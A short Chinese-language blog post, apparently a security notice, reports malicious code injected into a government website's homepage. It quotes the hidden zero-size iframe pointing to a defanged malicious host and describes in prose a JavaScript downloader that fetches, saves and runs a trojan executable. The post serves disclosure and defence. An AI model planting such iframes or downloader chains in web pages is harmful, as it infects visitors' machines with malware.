又一个下载恶意文件的政府网站

简介: 又一个下载恶意文件的政府网站

首页有3处地方被加入:

/--------
<iframe height=0 width=0 src="hxxp://***object.cnic**b.com/15"></iframe>
--------/

hxxp://***object.cnic**b.com/15   的内容为插入许多空格的JavaScript脚本,利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://***object.cnic**b.com/15/du.exe, 保存为 IE临时文件夹中的 test.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

du.exe 采用 nSPack 1.3  加壳。Kaspersky 报为 Trojan-Downloader.Win32.Delf.aul。


相关文章
|
安全 Linux 网络安全
渗透攻击实例-黑客大佬们都浏览哪些网站?
渗透攻击实例-黑客大佬们都浏览哪些网站?
渗透攻击实例-黑客大佬们都浏览哪些网站?
|
26天前
|
监控 JavaScript 前端开发
两个会自动下载恶意程序文件的政府网站
两个会自动下载恶意程序文件的政府网站
|
26天前
两个下载恶意程序文件的政府网站换花样了
两个下载恶意程序文件的政府网站换花样了
|
26天前
|
安全 数据安全/隐私保护
一个被挂木马的政府网站
一个被挂木马的政府网站
|
29天前
|
安全 应用服务中间件 开发工具
Web安全-SVN信息泄露漏洞分析
Web安全-SVN信息泄露漏洞分析
100 2
|
26天前
|
安全
又一个被挂木马的政府网站(第3版)
又一个被挂木马的政府网站(第3版)
|
开发框架 安全 前端开发
【网络安全】护网系列-web漏洞(文件上传漏洞、文件包含漏洞)
【网络安全】护网系列-web漏洞(文件上传漏洞、文件包含漏洞)
386 0
|
缓存 安全 搜索推荐
蓝科lankecms漏洞导致被黑客攻击篡改首页文件
近期受到很多用蓝科lankecms网站源码做的网站的客户反馈首页文件index.html和m.html被篡改增加了跳转代码,导致从百度点击进来的直接跳转到世界杯体育网站上去,而且百度快照收录的标题也被篡改了,通过客户的叙述,发现此源码是用tp架构二次开发的,其中源码文件LoginAction.class.php和TextAction.class.php被作者加密了,具体内容无法解密,用的是混淆加密,被篡改的客户基本都是在同一时间批量被篡改,跳转的网址也是一致的,了解情况后我们SINE安全立即安全技术对客户网站进行排查和溯源。
349 0
|
安全 Linux 网络安全
国家信息安全公布:向日葵爆出执行漏洞,还有什么远程工具值得信赖?
国家信息安全公布:向日葵爆出执行漏洞,还有什么远程工具值得信赖?
国家信息安全公布:向日葵爆出执行漏洞,还有什么远程工具值得信赖?
|
SQL 安全 关系型数据库
公司网站被劫持到其它网站如何解决
公司网站被劫持到其它网站如何解决
364 0
公司网站被劫持到其它网站如何解决